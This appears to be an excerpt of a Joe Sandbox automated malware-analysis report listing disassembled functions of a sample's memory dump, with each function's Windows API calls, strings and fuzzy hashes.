Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 3e4fbb8ddc18881b9aed0b3b9e755d3ae0e53865e5ef8efdba303009a5401931
Instruction ID: d280e7d479053f21472691e2d54f00f4344cf49d8afec56bd62297033d3b350f
Opcode Fuzzy Hash: 3e4fbb8ddc18881b9aed0b3b9e755d3ae0e53865e5ef8efdba303009a5401931
Instruction Fuzzy Hash: EA31837060071EDBCF14EF94C8819BEB7B4FF55320B108A2AE965E7791DB75A905CB80

Function 00829372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D7F41: _memmove.LIBCMT ref: 007D7F82

Part of subcall function 0082B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0082B0E7

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 008293F6
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00829409
SendMessageW.USER32(?,00000189,?,00000000), ref: 00829439

Part of subcall function 007D7D2C: _memmove.LIBCMT ref: 007D7D66

Strings

ListBox, xrefs: 008293B5
ComboBox, xrefs: 00829380

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 0d2c05329b3dc7cec542f86abc5d0bc53c7fa1e42aa0873d1ec3f04fc2f46cf8
Instruction ID: 107df6f7140553940b59171027b3b2b86ef8941d7268fe7bf288f5a546ed2805
Opcode Fuzzy Hash: 0d2c05329b3dc7cec542f86abc5d0bc53c7fa1e42aa0873d1ec3f04fc2f46cf8
Instruction Fuzzy Hash: FB21D271900118BBDB18AB64EC8ACFFB7B8EF45350F14412AF965D73E1DB39094AD610

Function 00856656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 007D1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007D1D73
Part of subcall function 007D1D35: GetStockObject.GDI32(00000011), ref: 007D1D87
Part of subcall function 007D1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 007D1D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 008566D0
LoadLibraryW.KERNEL32(?), ref: 008566D7
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 008566EC
DestroyWindow.USER32(?), ref: 008566F4

Strings

SysAnimate32, xrefs: 008566AB

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: d5c14e84d50d06e670d3f35b46fae824df94c4cfdd965f70d8c5de8c94bea3af
Instruction ID: 91ae1347d99fc14024ea29766226de6539755e81abae055cb58d3d2395661ac3
Opcode Fuzzy Hash: d5c14e84d50d06e670d3f35b46fae824df94c4cfdd965f70d8c5de8c94bea3af
Instruction Fuzzy Hash: 31218E71200205ABEF108E64DC90EBB77EDFB6936AF904629FE11D3190E771DC659760

Function 0083703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 0083705E
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00837091
GetStdHandle.KERNEL32(0000000C), ref: 008370A3
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 008370DD

Strings

nul, xrefs: 008370D8

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: fce7219b49b43264f41471e2a9cb12015fbc3ec4b0e36b1e2881a7cd24ae6b5b
Instruction ID: 8e4a476a1406b9cd8c5af259aa01dc216c1ea18cb3e4989680ed2b8f80a66111
Opcode Fuzzy Hash: fce7219b49b43264f41471e2a9cb12015fbc3ec4b0e36b1e2881a7cd24ae6b5b
Instruction Fuzzy Hash: 13218EB4504709ABDB34AF28DC15A9A77A8FF94725F208A19FDA0D72D0EB70D8508B91

Function 0083710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 0083712B
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0083715D
GetStdHandle.KERNEL32(000000F6), ref: 0083716E
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 008371A8

Strings

nul, xrefs: 008371A3

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: d2e20a887358a77eaf36785bc49220d0e638ffc2b17871f9a7992e7c2fd2a40e
Instruction ID: 6e45b80eb0f00a3e39c659d1f02a40c9089446dc30cf7ea702e70e7827466d0a
Opcode Fuzzy Hash: d2e20a887358a77eaf36785bc49220d0e638ffc2b17871f9a7992e7c2fd2a40e
Instruction Fuzzy Hash: A62160B6504309ABEF309F689C04A9EB7A8FF95724F204619FDA1D72D0EB70D8518BD1

Function 0083AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0083AEBF
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0083AF13
__swprintf.LIBCMT ref: 0083AF2C
SetErrorMode.KERNEL32(00000000,00000001,00000000,0085F910), ref: 0083AF6A

Strings

%lu, xrefs: 0083AF26

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: b1143e3aa7740958d161a0ab8182e8d993048bfb24f533f10ca1220df4e2af46
Instruction ID: 4bf8dc313fbfcba21a8a0956e471c3a2eb169c15edae3af35d33c82da3cd404a
Opcode Fuzzy Hash: b1143e3aa7740958d161a0ab8182e8d993048bfb24f533f10ca1220df4e2af46
Instruction Fuzzy Hash: A5213270600209AFCB10EF54C985DAE7BB8FF89714B104069F905EB352DB75EA45CB61

Function 0082A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D7D2C: _memmove.LIBCMT ref: 007D7D66

Part of subcall function 0082A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0082A399
Part of subcall function 0082A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0082A3AC
Part of subcall function 0082A37C: GetCurrentThreadId.KERNEL32 ref: 0082A3B3
Part of subcall function 0082A37C: AttachThreadInput.USER32(00000000), ref: 0082A3BA

GetFocus.USER32 ref: 0082A554

Part of subcall function 0082A3C5: GetParent.USER32(?), ref: 0082A3D3

GetClassNameW.USER32(?,?,00000100), ref: 0082A59D
EnumChildWindows.USER32(?,0082A615), ref: 0082A5C5
__swprintf.LIBCMT ref: 0082A5DF

Strings

%s%d, xrefs: 0082A5D9

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 7750f7b2bd92e33c38829c566bc7ea44935d6f59f9ddbb71b81d24ec40d30f24
Instruction ID: c0c14e0993da69e2fc4a720f24aaaf8c34bbb50641ec5ae6226422b01802f4e1
Opcode Fuzzy Hash: 7750f7b2bd92e33c38829c566bc7ea44935d6f59f9ddbb71b81d24ec40d30f24
Instruction Fuzzy Hash: E6119371200218BBDF14BF64EC89FAA37B9FF48701F044075BA18EA252DA7459858B76

Function 00832017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00832048

Strings

REMOVE, xrefs: 0083204E
EXISTS, xrefs: 00832070
APPEND, xrefs: 00832081
KEYS, xrefs: 0083205F

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 8bf28a0812b618ed714576cf7def1be92d327de0402a6ee48eb33732c4cfb4f1
Instruction ID: 8e93d9cdee91b4d3d15caf28380b836ac2117a2fc452ad761c5d376df141d64c
Opcode Fuzzy Hash: 8bf28a0812b618ed714576cf7def1be92d327de0402a6ee48eb33732c4cfb4f1
Instruction Fuzzy Hash: FF113934900109CFCF18EFA4D9954BEB7B4FF56304F108469D956A73A2EB36690ACB90

Function 00848F5B Relevance: 7.9, APIs: 5, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0085F910), ref: 0084903D
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0085F910), ref: 00849071
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 008491EB
SysFreeString.OLEAUT32(?), ref: 00849215

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 6dfb62bc590c052197d57427e05e1816259295cb075921195247637566eff767
Instruction ID: c5eac3007fc6b57158d0ceb10c3d4ba66783cea3cd0fc4336f646f76218306df
Opcode Fuzzy Hash: 6dfb62bc590c052197d57427e05e1816259295cb075921195247637566eff767
Instruction Fuzzy Hash: 63F13571A00209EFCB14DF94C888EAEB7B9FF49315F108099F956EB291DB35AE45CB50

Function 0084EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0084EF1B
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0084EF4B
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0084F07E
CloseHandle.KERNEL32(?), ref: 0084F0FF

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: a6bd5999a1a2fe308db0b56b8254a4a30a67cbec52097fd55565862769b2d068
Instruction ID: adcc029fb963b04b8a4c6260b8bf6a5e76ba8c2464fd9020fae620c54d3c3fbe
Opcode Fuzzy Hash: a6bd5999a1a2fe308db0b56b8254a4a30a67cbec52097fd55565862769b2d068
Instruction Fuzzy Hash: 31812D716047119FD720EF28C846B6AB7E5FF88710F14881EF699DB392DB75AC408B52

Function 008502C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 007D7F41: _memmove.LIBCMT ref: 007D7F82

Part of subcall function 008510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00850038,?,?), ref: 008510BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00850388
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008503C7
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0085040E
RegCloseKey.ADVAPI32(?,?), ref: 0085043A
RegCloseKey.ADVAPI32(00000000), ref: 00850447

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 322b8563aaee3877a4a68dc9cf4751603ac88250df33958b3021e3c67a8fc993
Instruction ID: 1f76a21ebf954647d0b2b6c59a01a6adcbf8b2e2cef1551d69ed31137ee7af49
Opcode Fuzzy Hash: 322b8563aaee3877a4a68dc9cf4751603ac88250df33958b3021e3c67a8fc993
Instruction Fuzzy Hash: 25513A31208204EFD704EF54D885E6EB7E8FF84319F04892EB99587292EB34E908CB52

Function 0084DBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 007D9997: __itow.LIBCMT ref: 007D99C2
Part of subcall function 007D9997: __swprintf.LIBCMT ref: 007D9A0C

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0084DC3B
GetProcAddress.KERNEL32(00000000,?), ref: 0084DCBE
GetProcAddress.KERNEL32(00000000,00000000), ref: 0084DCDA
GetProcAddress.KERNEL32(00000000,?), ref: 0084DD1B
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0084DD35

Part of subcall function 007D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00837B20,?,?,00000000), ref: 007D5B8C
Part of subcall function 007D5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00837B20,?,?,00000000,?,?), ref: 007D5BB0

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: ef8e4a424604b08ac3192a4d570c337c7883d1332746834e4a6bfebc6e2f845a
Instruction ID: 596e4178bd553646b9ae3bce03d8d31a6fd15f2eb0a075280ce8520b58f39290
Opcode Fuzzy Hash: ef8e4a424604b08ac3192a4d570c337c7883d1332746834e4a6bfebc6e2f845a
Instruction Fuzzy Hash: 0F511875A00609DFCB00EF68C488DADB7F4FF58314B14C06AE919AB312DB38AD45CB91

Function 0083E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0083E88A
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0083E8B3
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0083E8F2

Part of subcall function 007D9997: __itow.LIBCMT ref: 007D99C2
Part of subcall function 007D9997: __swprintf.LIBCMT ref: 007D9A0C

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0083E917
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0083E91F

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: ca399513dd6e8325a93f23c07ca3a3975718e5a0566a33810e4eb2ea9d616a51
Instruction ID: 84e19cdb849db0dabd664b245caed4d354bc9db2d2dffc9ab80c64096fbe6cd8
Opcode Fuzzy Hash: ca399513dd6e8325a93f23c07ca3a3975718e5a0566a33810e4eb2ea9d616a51
Instruction Fuzzy Hash: 18511A35A00215EFCB01EF64C985AAEBBF5FF48310F1480A9E949AB362CB35AD51DB50

Function 0085A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab0a375b695d653ece7dc1fcf287c0cf72f5afa626f963206dc3d4d0f594ec0f
Instruction ID: a73b496adfee4698420880df8b0ed0f2dbfb8cf56eebc8a9f1bc7548907d0736
Opcode Fuzzy Hash: ab0a375b695d653ece7dc1fcf287c0cf72f5afa626f963206dc3d4d0f594ec0f
Instruction Fuzzy Hash: AE41D235900208ABC718DB68CC88FE9BBA8FB09356F140265FD55E72E1D770AE49DA51

Function 007D2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 007D2357
ScreenToClient.USER32(008967B0,?), ref: 007D2374
GetAsyncKeyState.USER32(00000001), ref: 007D2399
GetAsyncKeyState.USER32(00000002), ref: 007D23A7

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 6d74392c5230de215ff5c0b8b12921977a26e06409e42fbf81c470588f0c2ed5
Instruction ID: ad8d533986d2c416f57fbe871a08b02e8ac66bad483613561812e056431ab4a5
Opcode Fuzzy Hash: 6d74392c5230de215ff5c0b8b12921977a26e06409e42fbf81c470588f0c2ed5
Instruction Fuzzy Hash: E841AE31504219FBCF159F68CC44AEDBB74FB15360F20435AF828D22E1C738A995DB91

Function 00826920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

